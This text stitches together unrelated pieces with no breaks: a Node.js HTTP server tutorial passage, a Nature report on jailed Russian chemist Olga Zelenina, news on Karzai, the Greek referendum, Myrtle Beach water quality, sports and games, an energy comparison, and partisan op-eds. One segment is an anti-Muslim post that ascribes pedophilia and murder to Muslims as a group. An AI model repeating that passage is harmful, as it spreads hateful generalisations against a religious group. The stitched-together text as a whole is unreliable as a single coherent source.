Note: It's important to set the status and headers before you start writing chunks of data to the body. This makes sense, since headers come before the body in HTTP responses.
Another Quick Thing About Errors
The response stream can also emit 'error' events, and at some point you're going to have to deal with that as well. All of the advice for request stream errors still applies here.
Put It All Together
Now that we've learned about making HTTP responses, let's put it all together. Building on the earlier example, we're going to make a server that sends back all of the data that was sent to us by the user. We'll format that data as JSON using JSON.stringify .
const http = require ( 'http' ) ; http . createServer ( ( request , response ) => { const { headers , method , url } = request ; let body = [ ] ; request . on ( 'error' , ( err ) => { console . error ( err ) ; } ) . on ( 'data' , ( chunk ) => { body . push ( chunk ) ; } ) . on ( 'end' , ( ) => { body = Buffer . concat ( body ) . toString ( ) ; response . on ( 'error' , ( err ) => { console . error ( err ) ; } ) ; response . statusCode = 200 ; response . setHeader ( 'Content-Type' , 'application/json' ) ; const responseBody = { headers , method , url , body } ; response . write ( JSON . stringify ( responseBody ) ) ; response . end ( ) ; } ) ; } ) . listen ( 8080 ) ;
Echo Server Example
Let's simplify the previous example to make a simple echo server, which just sends whatever data is received in the request right back in the response. All we need to do is grab the data from the request stream and write that data to the response stream, similar to what we did previously.
const http = require ( 'http' ) ; http . createServer ( ( request , response ) => { let body = [ ] ; request . on ( 'data' , ( chunk ) => { body . push ( chunk ) ; } ) . on ( 'end' , ( ) => { body = Buffer . concat ( body ) . toString ( ) ; response . end ( body ) ; } ) ; } ) . listen ( 8080 ) ;
Now let's tweak this. We want to only send an echo under the following conditions:
The request method is POST.
The URL is /echo .
In any other case, we want to simply respond with a 404.
const http = require ( 'http' ) ; http . createServer ( ( request , response ) => { if ( request . method === 'POST' && request . url === '/echo' ) { let body = [ ] ; request . on ( 'data' , ( chunk ) => { body . push ( chunk ) ; } ) . on ( 'end' , ( ) => { body = Buffer . concat ( body ) . toString ( ) ; response . end ( body ) ; } ) ; } else { response . statusCode = 404 ; response . end ( ) ; } } ) . listen ( 8080 ) ;
Note: By checking the URL in this way, we're doing a form of "routing". Other forms of routing can be as simple as switch statements or as complex as whole frameworks like express . If you're looking for something that does routing and nothing else, try router .
Great! Now let's take a stab at simplifying this. Remember, the request object is a ReadableStream and the response object is a WritableStream . That means we can use pipe to direct data from one to the other. That's exactly what we want for an echo server!
const http = require ( 'http' ) ; http . createServer ( ( request , response ) => { if ( request . method === 'POST' && request . url === '/echo' ) { request . pipe ( response ) ; } else { response . statusCode = 404 ; response . end ( ) ; } } ) . listen ( 8080 ) ;
Yay streams!
We're not quite done yet though. As mentioned multiple times in this guide, errors can and do happen, and we need to deal with them.
To handle errors on the request stream, we'll log the error to stderr and send a 400 status code to indicate a Bad Request . In a real-world application, though, we'd want to inspect the error to figure out what the correct status code and message would be. As usual with errors, you should consult the Error documentation.
On the response, we'll just log the error to stderr .
const http = require ( 'http' ) ; http . createServer ( ( request , response ) => { request . on ( 'error' , ( err ) => { console . error ( err ) ; response . statusCode = 400 ; response . end ( ) ; } ) ; response . on ( 'error' , ( err ) => { console . error ( err ) ; } ) ; if ( request . method === 'POST' && request . url === '/echo' ) { request . pipe ( response ) ; } else { response . statusCode = 404 ; response . end ( ) ; } } ) . listen ( 8080 ) ;
We've now covered most of the basics of handling HTTP requests. At this point, you should be able to:
Instantiate an HTTP server with a request handler function, and have it listen on a port.
Get headers, URL, method and body data from request objects.
objects. Make routing decisions based on URL and/or other data in request objects.
objects. Send headers, HTTP status codes and body data via response objects.
objects. Pipe data from request objects and to response objects.
objects and to objects. Handle stream errors in both the request and response streams.
A. Stenin/RIA Novosti
Russian scientists have reacted with alarm to the jailing of a colleague, narcotics expert Olga Nikolaevna Zelenina, on charges of aiding drug trafficking. Researchers believe that Zelenina has been falsely accused, and fear that the free pursuit of science in Russia is in jeopardy. “With state repression being a recurring issue in this country, the outcome of this case is very important for us all,” says Mikhail Gelfand, a biologist at the Institute for Information Transmission Problems in Moscow.
As Nature reported last week (Nature http://doi.org/jd5; 2012), Zelenina, an analytical chemist at the Penza Agricultural Institute in Russia, was arrested at her home on 15 August by officials from the Russian Federal Drug Control Service (FDCS), who were accompanied by masked and armed members of a special police unit. Five days later, a judge at Moscow's Zyuzino District Court ruled that Zelenina would be detained until 15 October, pending a trial.
Zelenina seems to have been targeted because of a scientific report that she prepared in September 2011 for the defence attorneys of Sergey Shilov, a Russian businessman under investigation by the FDCS. As an expert on narcotic compounds in hemp and poppy, Zelenina was asked to assess the concentration of opiates in a 42-tonne shipment of food poppy seeds that Shilov had imported from Spain in 2010. Russia banned cultivation of the opium poppy (Papaver somniferum) in 1987, but the seeds can still be imported for use in foods including bread or cake, as long as they are free of alkaloids such as morphine and codeine. The seeds themselves do not contain these compounds, but other parts of the plant do, and can contaminate shipments.
In her analysis, Zelenina found that the concentration of opium alkaloids in Shilov's seed shipment was negligible, and that there was no scientific evidence that the seeds had been imported for the purpose of extracting illegal drugs. Her report also stated that it is technically impossible to completely eliminate these alkaloids from batches of poppy seeds.
Her findings apparently did not please the FDCS. Although a Moscow court ruling on 24 September raised hopes that Zelenina's case could be heard sooner than October, she remained in custody as Nature went to press. For now, Zelenina shares a cell with activist Nadezhda Tolokonnikova, one of three members of the Russian punk band Pussy Riot who were last month sentenced to two years in jail on charges of hooliganism. Their crime was singing a song critical of Russian president Vladimir Putin in Moscow's Cathedral of Christ the Saviour.
Zelenina's “is the most outrageous case I've heard of so far”, says Ivan Gololobov, a sociologist at the University of Warwick in Coventry, UK, who has read the Russian-language report that was used to make the case against the chemist. Gololobov notes that Russia often restricts speech and art that are critical of the government. “But the case of Zelenina, an expert who expressed independent opinions and arrived at scientific conclusions different from those of the prosecutors, is a step further,” he says. “She stands accused not for oppositional activity or for her political opinions, but simply because of her independent professional expertise. If proven guilty, she is facing a severe sentence.” A conviction could carry a sentence of several years in prison.
Natalia Andreeva, Zelenina's Moscow-based lawyer, says that the case is reminiscent of that of botanist and geneticist Nikolai Vavilov. He was jailed in 1940 and died in prison three years later, having challenged the non-Mendelian doctrines of heredity propagated at the time by Trofim Lysenko and backed by Joseph Stalin.
Last month, the Russian government's human-rights commissioner, Vladimir Lukin, appealed against Zelenina's detention without success. Zelenina is now recognized as a political prisoner by the Union of Solidarity, a Russian human-rights watchdog. And last week, Russian scientists launched an online petition campaigning for her immediate release (go.nature.com/ihxmxu).
The case reveals the inferior status of professional science in modern Russia, says Mikhail Feigel'man, a physicist at the Landau Institute for Theoretical Physics in Moscow. “There is a lot of talk going on here these days that the absence of a functioning system of technological innovation and professional scientific expertise is one of the big problems in this country,” he says. “These qualities have indeed all but vanished — and Olga's case makes me fear that they will not come back any time soon. Scientists in Russia will understand that what they are doing is more likely to get them in trouble than do anything good for society.”
Afghan President Hamid Karzai signaled his defiance of the United States in his final address before the country's parliament Saturday, claiming U.S. troops are not needed in Afghanistan as his military is ready to take over entirely.
Karzai also reiterated that he would not sign a security agreement with the United States that would allow American soldiers to stay in Afghanistan to help train and mentor Afghan troops and hunt down al-Qaeda, the Associated Press reports. The outgoing president has come under heavy pressure from the United States and other nations, as well as a council of notable Afghanis, to sign the Bilateral Security Agreement.
“I want to say to all those foreign countries who maybe out of habit or because they want to interfere, that they should not interfere,” said Karzai on Saturday.
Karzai has been president of his embattled country since December 2001, and last won a presidential election in 2009. He has increasingly been at odds with the United States, opposing U.S. military operations against the Taliban even as it ramped up attacks and civilian killings in recent months.
The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now
His refusal to sign a security agreement with the United States may be futile, however, as all 10 candidates seeking the presidency in April 5 elections have said they will sign the agreement.
[AP]
Contact us at editors@time.com.
Out of the blue, July 5th turned out to be the most important day for Euro zone as well as European Union as Greeks will be voting to whether or not accept creditors' proposal.
The voting may be on proposals, however according to officials and leaders the voting would decide Greece's stay in Euro zone.
Greek Prime Minister Alexi Tsipras tried to push a proposal asking a third bailout of €29.1 billion, which would have covered Greece's need for the next two years. However all negotiations were halted from European side until the result of the referendum is declared.
According to European leaders, they want assurance from Greek people that they want help and wants to stay in European Monetary Union.
Polls are showing that people are with Prime Minister Alexis Tsipras as of now, who is supporting for a No campaign.
According to a poll by proRata Institute, 54% of the Greeks are likely to reject bailout while 33% remain in favor.
However, bank closure has changed many to revise thoughts another poll shows. Before bank closure was announced 57% were voting in favor of No dropped to 46% after.
VIDEO: Muslims In Canada Say 9-Year-Old's Are Adults And It's Okay To Have Sex With Them
Muslims Blast Canadian Man On The Difference Between Western Laws And Sharia Values
Using a 4-year-old to murder a man, using a 10-year-old girl as a human bomb, beheading people, drowning people, throwing homosexuals off buildings. Nothing is off limits for the religion of peace.
The Muslim in this video tell off the Canadian man saying they aren't pedophiles for sleeping with a 9-year-old because the 9-year-old is an adult.
He goes onto state that he goes around slapping people that don't agree with him and then says that slapping is nothing and that in other countries those people would be killed.
The Muslim says that anyone who says Mohammed is a false prophet deserves to die.
Video
H/T: The Religion Of Peace
On Wednesday evening, a federal judge in Hawaii issued one of the most inane and insane judicial rulings in recent memory, placing a national temporary restraining order on President Trump's revised executive order concerning refugees and immigration from terror-rich countries. The decision is a clear usurpation of legislative function by the judiciary and a clear overwriting of power delegated to the president by the Constitution and relevant legislation. What's worse, the logic essentially allows any state to destroy the president's power as commander-in-chief.
Here are the three worst elements of the judicial decision.
1. The Court Says That The Constitution Bars Religious Discrimination Against Foreigners. This is just asinine. The Constitution does not apply to foreigners. And in fact American immigration policy has differentiated based on culture and religion in the past. The idea that our immigration policy under the Constitution must grant rights to people to immigrate is simply ridiculous. That would mean we could never have an immigration policy that discriminates at all. Which means open borders for everyone, or closed borders for everyone. That's nuts.
2. The Court Says Motivation Matters, Not Text. The court makes the nutty ruling that Trump's executive order, which clearly is not a Muslim ban, is actually a Muslim ban. Why? Because Trump said during the campaign that he thinks “Islam hates us,” and said about his first travel ban that it was directed toward radical Islam. Never mind that the new travel ban has no religious language in it whatsoever, that the countries named in the ban were originally named by the Obama administration, and that the court openly acknowledges that the executive order is facially neutral. Nope. They say that Trump said mean things about Muslims, so we can interpret the executive order as an extension of his feelings. Obviously, courts don't apply this rule consistently – Obama said repeatedly that the mandate in Obamacare was not a tax, it was a fee, but the court rewrote the statute to protect it. But here's the biggest problem with this argument: if an executive action can be challenged based on motivation, can states sue to prevent wars because Trump has said that “Islam hates us”? What if Trump decides on a military strike in Yemen? That's a Muslim country. And Trump has said bad things about Islam. So why wouldn't the establishment clause bar him from such discrimination?
3. The Court Grants Standing Based On Hurt Feelings. The guy who sued in this case was a Muslim American named Dr. Ismail Elshikh. He's an American citizen of Egyptian descent. The executive order doesn't apply to American citizens or to Egypt. So how does he have standing? He doesn't. But the court found that he does, because his mother-in-law lives in Syria. The court said he has standing because he declares that the executive order is “devastating to me, my wife and children,” since it “sadden[s]” him. That's one hell of a legal standard. Most government action is devastating to someone. Does that give them standing to sue? What absolute idiocy.
There's no question that this judicial decision is a farce. It should motivate Congress to restrict the jurisdiction of federal courts or break up the Ninth Circuit – actions Congress should have taken long ago. This is rule by fiat, and it is not contemplated in any way by the Constitution.
Bacterium Levels In Myrtle Beach test 5 times above safe swimming
The most recent May 24th testing for bacteria levels in Myrtle Beach showed a 557 near Breakers Resort. Those results were taken at 24th Avenue North. This oceanfront location is just 3 blocks from Breakers Resort Hotel. Acceptable, safe numbers are 104 or below. A long term no swim advisory is permanently placed in this area.
Elevated bacteria levels in Myrtle Beach, coupled with the past weekend's violence, resulted in two national media groups warning visitors of Summer travel to the downtown area.
Myrtle Beach continues to struggle with various drainage areas showing elevated bacteria levels in Myrtle Beach ocean waters. The S.C. Department of Health and Environmental Control warns beach goers not to swim in any waters where results exceed levels of 1o4. The reading on 24th Avenue North was five times over the safe swimming level.
In Summer months ocean waters get warmer. Bacteria do better in warmer waters. Local residents continue to watch the DHEC monitoring weekly. Locals are concerned as bacteria levels in Myrtle Beach will reach their peak over the next two months.
May 24th Test Results Near Breakers Resort on 24th Ave.
A NO SWIM ADVISORY DOES NOT BAN ANYONE FROM GOING INTO THE OCEAN. THE BEACHES IN THE CITY OF MYRTLE BEACH ARE NOT CLOSED. THIS DHEC ADVISORY IS SIMPLY POSTED TO ALERT BEACH GOERS OF HIGHER BACTERIA LEVELS IN MYRTLE BEACH OCEAN WATER. The most common recreational water illnesses from swimming in ocean areas with high bacteria readings are gastrointestinal. Symptoms include vomiting, diarrhea, nausea, abdominal pain or fever. These illnesses result from swallowing water contaminated by disease-causing organisms. Contact with contaminated water can also cause upper respiratory (ear, nose and throat), and wound infections. Young children, the elderly, and those with a weakened immune system are particularly vulnerable to recreational water illnesses.
Related articles across the web
Comments
comments
The debate between conventional energy sources and alternative energy sources is ongoing that will only be exacerbated as the years go on. This is mostly due to the fact that more and more people are becoming aware that conventional energy sources, such as coal and oil, immensely pollute the environment. Coal and oil is relatively cheap, which is one of the reasons they have become the USA's primary energy sources since the Industrial Revolution began. Now, as climate change and global warming are becoming more salient topics, US residents are wondering how these conventional energy sources could be replaced. In this article, we are going to honestly examine three alternative energy sources: solar, wind, and geothermal. Some aspects that are going to be focused on will be the true cost of these systems, savings potential, and overall pros/cons.
Introduction to Solar:
Solar energy has become increasingly popular over recent years due to it's ease-of-installation and convenient placement. Recent improvements have made solar panels far more efficient than ever before, leading more and more homeowners to consider using the sun as an energy source.
Unlike other energy sources, there is no rotational force. Instead, solar cells within the panels convert sunlight in D/C energy, which is then inverted into A/C energy for household consumption.
Main Segment:
Installation costs:
Installation costs vary heavily depending on a number of factors. Roofs with a larger surface area will obviously bring higher installation costs, but will bring more energy and savings potential as well. Additionally, the government rebate for installing solar panels can often vary.
The cost to install a solar system is about $7-9 per watt, about $20,577 for the average households. Rebates tend to range from 10-20%, meaning that the final cost could be as low as about $15,000.
Savings Potential:
Within a 20 year span, the average household could save anywhere from 7K-30K depending on the area you live in , thanks to a solar-powered system. Maintenance costs generally tend to be in the hundreds and is required every few years depending on model.
Eligible homes:
For many households, solar may not be worth the cost. Houses which are far from the equator, under constant cloud cover (which scatters over 20% of rays), or under a source of shade are rendered significantly less efficient than areas such as South America or Africa. It's best if the house is relatively far from tree lines and other structures (especially East and West of the house) to keep the horizon free and increase exposure time throughout as much of the day as possible.
Pros:
-Available for most households
-Affordable for many households
-Discreet
-Safe
Cons:
-Performance dependent upon weather – As you'd expect, clouds heavily limit input
-Households beneath trees or in particularly cloudy areas will generate significantly less electricity
-Has extreme growth potential, leaving some homeowners to wait until even more efficient versions come out to purchase the addition
-Requires storage and an inverter, which takes up additional space on house
-Potentially vulnerable to weather damage/vandalism.
Introduction to Wind:
Wind energy is unquestionably one of the most talked about energy sources when people discuss alternative energies and for good reason. It is quite simple how the utilization of wind energy works; once infrastructure such as wind turbines are built, they are used to harness the naturally occurring winds that happen on a daily basis. These winds can be used to power any type of entity that requires electricity. Not only is wind a clean and renewable energy source, but also it is by far one of the most abundant sources of energy available on Earth. Despite the immense benefits, there are some drawbacks as well, which are going to be explained in the upcoming sections.
Main Segment:
Initial costs:
Depending on the type of wind turbine that is being created, the initial bill would be anywhere from $80,000 to $4,000,000. If one is planning to install his or her own personal wind turbine, the total cost will end up at approximately $80,000 or more. On a larger scale, a commercial wind turbine, which would provide power to more than one household or business, the initial costs could total $3-4 million. For commercial wind turbines, that is obviously a large number but the bright side is the average person does not have to worry about paying for those initial costs. This is why wind energy is one of the most cost-effective energy sources because your average person could simply buy this energy from a company that specializes in producing wind energy. If someone decided to go this route, it would be very favorable to potential consumers because on average wind energy costs $.02 per kilowatt-hour. Therefore, the average consumer has choices; they could purchase their own wind turbine or buy the power through another company. It is important to note that if someone lives in the ideal area for wind energy, their electricity bill could potentially be reduced by 50-90%.
Maintenance costs/Lifespan:
Now, wind turbines do not last for a lifetime and they do require maintenance checks much like any other energy system. An average wind turbine is estimated to last for about 20 years before it needs to be replaced and maintenance checks are necessary every few years if not every year. These maintenance checks are not insanely expensive, though; most cost a couple hundred dollars.
Payback rate/Subsidies:
There is some conflicting data on the potential payback rate for wind energy systems. Some places estimate that large wind turbines payback period could be less than a year while others claim, depending on the capacity of the turbine, the payback period could exceed 10 years. Moreover, there are estimates that 10-15 kW turbines would pay for itself within 30-45 years. This is a primary concern of people that are hesitant to move away from our traditional energy systems, so it is important that we find more conclusive data on this issue. However, the lack of certainty on the payback period has not stopped the federal government from subsidizing this industry, as the government pours billions of dollars into the wind energy sector. In fact, from fiscal year 2010-2013 wind energy subsidies increased by 9% from $5.4 billion to $5.9 billion.
Pros:
Clean source of power
– Renewable source of power
-Wind is an abundant energy source that is the largest source of new generating capacity
–Wind is a cost-effective source of power
-One of the least expensive forms of energy once installed ($.02 per kilowatt-hour)
-Job creation
Wind energy is expected to grow by 108% over the next decade
-The economies of farms and ranches would benefit since that is where the turbines will most likely be installed
Cons:
-Wind may not be provided on a consistent basis in some areas of the country
–Visual impacts and the sound produced could be an annoyance to people living in the area
-Initial costs are high
Home wind turbines: $80,000
Commercial wind turbines: $3-4 million
–Storms and other natural events could damage the turbines, thus potentially putting people at risk
-Wind turbines can only be set up in remote locations, so extra infrastructure would need to be built to reach residential locations
Introduction to Geothermal:
It is no secret that the Earth itself produces more than enough energy to meet all the world's energy needs. Geothermal systems take advantage of this fact. Just like nearly every other source of energy out there, geothermal power is generated by utilizing steam to spin a turbine. However, unlike other systems, geothermal energy makes use of the energy naturally produced within the Earth. This is achieved in different ways by different systems, but they all work on the same general principle; they tap into Earth's internal heat to either create steam, or access steam that occurs naturally within the Earth.
Main Segment:
Types of Systems available:
Personal Heating and Cooling Systems
One of the most popular and accessible uses of geothermal energy are home heating and cooling systems. While these systems do not produce electricity, they can be used to drastically reduce the energy use at your home. Geothermal heating and cooling systems work by tapping into shallow ground (around 10ft LINK!), to access natural temperature fluctuations. These systems take the place of conventional heating/cooling systems and can reduce your utility bills by 40-60%. While they do cost around twice as much as conventional systems to install (between $20,000- $25,000), they have a lifespan of around twice that of conventional systems (18-23 years) and will likely save you money over the course of 2-10 years. This is not even taking into account that if you live in the United States you will likely be eligible for a 30% tax cut. If you want to check to see if you are eligible, check out http://www.dsireusa.org/ for state-by-state information and potential savings.
Energy Production Systems
Unlike other energy options, there are not geothermal power systems available for personal home use. This is due to the fact that installation of these plants is only economical for use on a large scale because of the massive energy production, as well as the costs of installation. While the cost of these systems varies greatly depending on where they are installed, they are technically viable options for everywhere on Earth.
Pros:
–Provides a virtually endless supply of clean energy, which can be used everywhere on earth
-Saves money over time generally
-Would/could make energy a free (or close to it) public resource due to the fact that the supply would be endless
–Virtually no cost fluctuations due to steady supply
-Generally environmentally friendly especially when compared to fossil fuels
Cons:
–In extreme cases, can cause earthquakes
–Does release some greenhouse gases (much less than oil or coal though)
-High upfront costs
–Much more difficult to access in some areas than in others.
–Contributed by: Frank Bursese, Bobby Amendola and Justin Mood
Advertisements
Share this: Tweet
Like this: Like Loading...
EAST RUTHERFORD, N.J. -- Two years ago, Tyler Thornton was one of the chosen ones, a 19-game starter for Duke as a sophomore.
Now his biggest role comes off the court, where he plays understudy to Seth Curry.
Curry, you see, doesn't practice much. He's got a shin injury to his left leg and an ankle injury to the right. The ankle will get better over time; the shin won't. It's a matter of managing it, keeping Curry fresh by keeping him off the court until the lights go on.
Tyler Thornton has sacrificed personal achievement to fill a crucial role. Lance King/Getty Images
But that can mess with a team's rhythm and continuity, which is where Thornton comes in. He essentially stands in for Curry during practice, and then when it counts, he takes a seat on the bench, waiting for his name to be called.
"In a lot of ways, Tyler has been the most important part of managing Seth's injury," coach Mike Krzyzewski said. "We're fortunate in that we've got really outstanding players."
Krzyzewski was talking about talent; he could have been talking about personality.
Duke is now 9-0, courtesy of a 90-67 pasting of Temple at the Izod Center, Krzyzewski's second-favorite home court (he's 21-1 here). The Blue Devils don't usually sneak up on people, but somehow this season they have, stunning folks with their hot start against seriously good competition -- Duke is 3-0 against top-5 teams; the rest of the country is 0-36.
Mason Plumlee has inserted himself into the national player of the year conversation, and Duke's balanced attack has been lauded across the country and even in the Bahamas.
Yet what separates this team right now is what a guy like Thornton is doing -- understanding what part of the puzzle he is.
He gets his role, and so do all of the Blue Devils.
Usually teams in December are still trying to figure out who they are and individuals are trying to figure out where they fit in. Heck, in some places, roster changeover requires "Hello My Name Is" tags.
Yet the Blue Devils know who they are, they know where they fit and they are perfectly comfortable with all of it.
"I think it's maturity," Curry said. "We've got older guys, and they know what their responsibilities are and that spreads to everyone else."
Krzyzewski has been around plenty of good teams, a few great ones and even a few bad ones. What separates them aside from talent, he said, is that sort of awareness coupled with a tenacity that renders the verb "play" woefully inadequate and polite.
Mike Krzyzewski sees similarities between this Duke team and past great ones. Bob Donnan/US PRESSWIRE
"The really outstanding teams wanted to fight," he said. "They didn't want to play. They wanted to compete and fight."
Whether or not this Duke team fits into that category will be determined in the spring, but no one will dispute this version already is silly good. Trying to find a flaw is like looking for an imperfection in the Mona Lisa. It's there, but you have to search.
Against Temple, the Blue Devils were great from the outside (36 points on 12-of-20 shooting from the arc) and inside (28 points). They had 19 assists on 28 made field goals and committed but six turnovers. Four players were in double figures, led by Curry's 23.
The Blue Devils, of course, will look for the flaws. They still need more help from their bench (only 15 points against the Owls) and better defensive rebounding (Temple pulled down 19 offensive boards).
"Winning covers up a lot," Mason Plumlee said. "When you're losing, it's easy to point out the problems. We know we're not there yet. We know we can get a lot better."
And the scary news for others -- they probably are about to. Krzyzewski said that freshman Marshall Plumlee, Mason's little brother, will likely play in Duke's next game on Dec. 19. Out since Oct. 12 with a stress fracture, he presumably will help fix two of those flaws -- he's a 7-foot big body who loves to rumble in the low post.
"He's a 7-footer who actually wants to be a center," Krzyzewski said. "Until he was injured, he was our sixth man."
When Plumlee comes back and becomes that sixth man, the rest of the bench players, of course, will drop down a spot in the rotation.
And odds are they won't care.
That, more than Mason Plumlee, torrid 3-point shooting or a great coach, is what makes this Duke team especially good.
Share. Snake to undergo pioneering facelift operation for remaster library. Snake to undergo pioneering facelift operation for remaster library.
Metal Gear Solid: Peace Walker may be amongst the first titles in the recently announced PSP Remaster series.
Yesterday we placed the excellent, though largely overlooked, Metal Gear title on our wishlist of PSP games that we'd most like to see make the leap from handheld to console.
According to French website JVN, in addition to crisp HD visuals, the updated version will be tailored for the PS3, taking full advantage of the Dual Shock's right analogue, which is of course absent on the PSP. There are as yet no details of it offering SIXAXIS support or stereoscopic 3D.
Peace Walker is expected be announced at this year's E3 in June.
Northwestern's unreal recruiting success continues, as they bring in four-star running back Justin Jackson from Carol Stream (Il.) Glenbard North.
Jackson, a consensus four-star, is ranked as the No. 2 all-purpose back in the nation. He also boasted offers from Big Ten squads in Illinois Iowa, Indiana, Purdue, and Minnesota, as well as national squads in Vanderbilt, Missouri, Kentucky, Mississippi State, Syracuse, Arizona State, and others. The 5'11, 180-pounder also played cornerback in high school.
Coming off a 10-win season and with facilities upgrades on the way, Northwestern has put together indisputably the best recruiting class in school history. He joins a four-star quarterback in Clayton Thorson, a four-star wide receiver in Dareian Watkins, and a three-star running back who chose the Wildcats over Texas in Auston Anderson. That's more than any class in school history, with offers still out. The Wildcats have nine pledges and currently sit at No. 15 in 247's composite rankings, fourth in the Big Ten behind just Michigan, Ohio State, and Penn State. It's bound to fall, though: Fitzgerald's class will only have 15 openings.
The recent success of Northwestern's recruiting has some taking note: Land-Grant Holy Land wrote that a dangerous Northwestern could be the new normal, and Sippin' on Purple's brilliant author filled with optimism. Here are some tweets!
That's three four-stars for Northwestern, a QB, RB, ad WR. Best class in school history gets better. — Rodger Sherman (@sippinonpurple) May 14, 2013
Also, using Rivals, there are 9 4-star players from IL in the 2014 class. Two have committed to NU, one to Vandy and one to Tennessee. Neat. — TheChampaignRoom.com (@Champaign_Room) May 14, 2013
It's almost as if winning, solid academics and the consistency of knowing your coach will never leave can be assets on the recruiting trail. — Paul Myerberg (@PaulMyerberg) May 14, 2013
Psst, hey, rest of Big Ten not-named Ohio State and Michigan, the conference's nerd school is whipping your ass on the recruiting trail. — Vico (@ourhonordefend) May 6, 2013
More from SB Nation:
Follow @SBNationCFB Follow @SBNRecruiting
• Ohio State's schedule as short stories
• RAINBOW WARRIORS BACK?
• LSU likely to sign No.1 class?
• When the SEC's seven-year streak could've ended
• National recruiting coverage
• Today's college football news headlines
This leads me to believe that we should start preparing for one of the most unprecedented elections in modern history to bring us one of the most unprecedented congressional sessions. Let's think big!
As Markos noted this week, the usual GOP alignments are literally ripping apart at the seams. The establishment, religious right, and tea party factions truly have no common interests to bind them together anymore. This portends a level of chaos among Republicans on the Hill like we have never seen.
Old alliances will be meaningless as everyone searches for the center of gravity that keeps them safe in the next election. Aligning with your party leadership will bring no guarantees, especially in the House, where things will be particularly fluid. The conventional wisdom in Washington is that Paul Ryan will continue his leadership post because who else do they have? But Donald Trump is already making it perfectly clear that he wants Ryan's head on a platter if his presidential bid goes down in flames (which it is).
This could lead to the best of all possible worlds for Democrats if they manage to take back both chambers of Congress. Sure, that's a big if, but it's possible and worth considering in advance. In part because considering the alternative yields little to nothing in the way of strategizing. And in part because a President Hillary Clinton could manage to pass some very important pieces of legislation if Democrats are ready to go big from the very outset.
This is where the progressive mindset comes in. The last time Democrats held the reins in 2009, the steady mantra from nearly all progressive advocates inside the Beltway along with some outside was that President Obama needed time and space to get the economic meltdown under control and pass health reform. I was there, reporting on it, and nearly all Washington advocates counseled patience from the very outset. Yes, in some ways it was understandable, but I didn't agree with it then and I don't agree with it in retrospect.
By mid-February of 2009, Obama had already signed the $787 billion stimulus package into law, which meant advocates were primarily counseling patience so the White House could work on one item—a very important item—but one item nonetheless: healthcare reform. By the time Obamacare finally cleared Congress after some impressive legislative jujitsu, it was already late March of 2010 and all anyone in Washington could talk about were the looming electoral clouds.
My point here is simply to remind the progressive left how short that two-year window is before midterms start dominating Beltway discourse again.
Following this abhorrent election cycle, Democrats will undoubtedly feel pulled to circle the wagons around Hillary Clinton just like they did with Obama. I can already imagine Washington advocates discouraging pressure from the progressive left because of how Clinton is being attacked by the right. But remember this: if historical trends hold true, Hillary Clinton may only have four years in the White House, and if Democrats are lucky enough to take the House, two of those years will account for the vast majority of her accomplishments, just like they did for Obama.
If anyone can capitalize on a chaotic GOP caucus to get through legislative priorities like infrastructure investment, immigration reform, college affordability, and others, that person is Hillary Clinton. She is built for the type of tactical maneuvering required for governing in that legislative environment. These priorities—ones she has mentioned repeatedly on the campaign trail—are possible with a House Democratic majority, even if it's a slim one.
But they are only possible if Democrats move at lightning speed to capitalize on the aftermath of the election—and the progressive left expects nothing less.
Kerry Eleveld is the author of “Don't Tell Me To Wait: How the fight for gay rights changed America and transformed Obama's presidency.”
1 of 1 2 of 1
Close to a hundred people joined me on September 23 outside the extravagant estate of lululemon's founder, Chip Wilson, to say just that. We chanted “Chip in, Chip!”, and presented a mock Notice of Assessment detailing just how much he'd owe every year under my Mansion Tax.
We came together to say that we need to tax the rich to build the housing we need. It's opened up a discussion in various media outlets, on social media, and in all-candidates meetings. And now I thought I'd take the time to explain what we are thinking in a bit of detail.
We have a housing crisis, as everyone knows. Over 2,000 people are homeless, average rents for a one-bedroom apartment are over $2,000, and working people are moving out of the city because they can't pay rent, let alone buy a home.
Providing a modular home to each person who needs it costs $75,000 per unit, or $160 million in total. And, for the 18,000 Vancouverites currently spending over 50 percent of their income on rent, we can build social and cooperative housing, costing about $360 million per year.
That's the housing we need but the private market is not building it.
That's what our Mansion Tax is for. Provincial and federal governments get their revenue from income tax which is progressive—the more you earn, the higher the rate of tax. Cities get their revenue from property tax which is a flat rate, making it impossible to get enough revenues without hurting modest homeowners. So we're proposing that if you own a home valued between $5 million and $10 million, we would tax an additional one percent. For the value of a home over $10 million we would tax an additional two percent. For homes worth $5 million or less, there would be no change to your taxes.
To be clear: the amount under $5 million would not be affected, so the impact would be minimal on even homes slightly over $5 million. We can structure the Mansion Tax so that no senior would have to leave their family home because their taxes were too high for their incomes. They could simply defer their taxes until they pass or sell their mansion.
This plan will bring in about $174 million a year. Just one year with the Mansion Tax is more than enough to cover the cost of modular housing—$160 million—for every person without a home. Studies have shown that keeping someone on the streets is actually more expensive than housing them: $23,000 per year in health care, policing, and other costs. So the initial investment will pay-for-itself in four years.
One critic of my plan, Brent Stanford, writing in 24 hours, simply ended up supporting my argument. “If we end homelessness we should be able to drastically cut back on the hundreds of millions of dollars government currently spends each year on Vancouver's Downtown Eastside,” he wrote. “This would be real savings.”
With the Mansion Tax, we'll start building hundreds of units of permanent social and co-op housing for people who desperately need housing. For the 18,000 Vancouver residents facing housing insecurity, it will cost about $360 million per year to build enough social and cooperative housing. The Mansion Tax alone will cover about half this cost.
The City reserves another $70 million per year for affordable housing with community amenity contributions and development cost levies. And we would still be getting housing contributions from federal and provincial governments to add to what we could get with the Mansion Tax.
We should work our way up the need scale so we are gradually housing people with higher incomes, but ensuring that all have a basic human right to decent housing.
In other countries people live in social housing. In Vienna, for example, 60 percent of residents live in social housing. It's nice housing and it's secure. We could have that here too with this source of revenue to buy land and build the housing.
We must also start making public land available to Indigenous people for housing. A key part of the plan will be to put substance into reconciliation.
We can use some of the money to put teeth in reconciliation, for housing and land for Indigenous people. For example, with this policy the threat of condo desecration at the Musqueam midden could have been stopped right away and the city could buy the land and return it to its rightful owners.
I'm not the only one who thinks a Mansion Tax is a good idea. “It's not a foreign system, it's not something that's coming totally out of the blue,” Andy Yan of SFU's city program approvingly said in a Vancouver Sun article.
From the same article, UBC economist Thomas Davidoff says: “It's very hard to find anything undesirable about raising taxes on high-value Vancouver property...Obviously, it's bad for the rich guys.”
A Mansion Tax would result in a bit less money for the rich but it's necessary. And I'm hoping that with new provincial legislation that reduces the amount that corporations and rich people can contribute to elections, we might have a greater chance of actually making it a reality and solving our housing crisis with it.
As I said at Chip's, this is the housing we need and this campaign is the revolution we need.
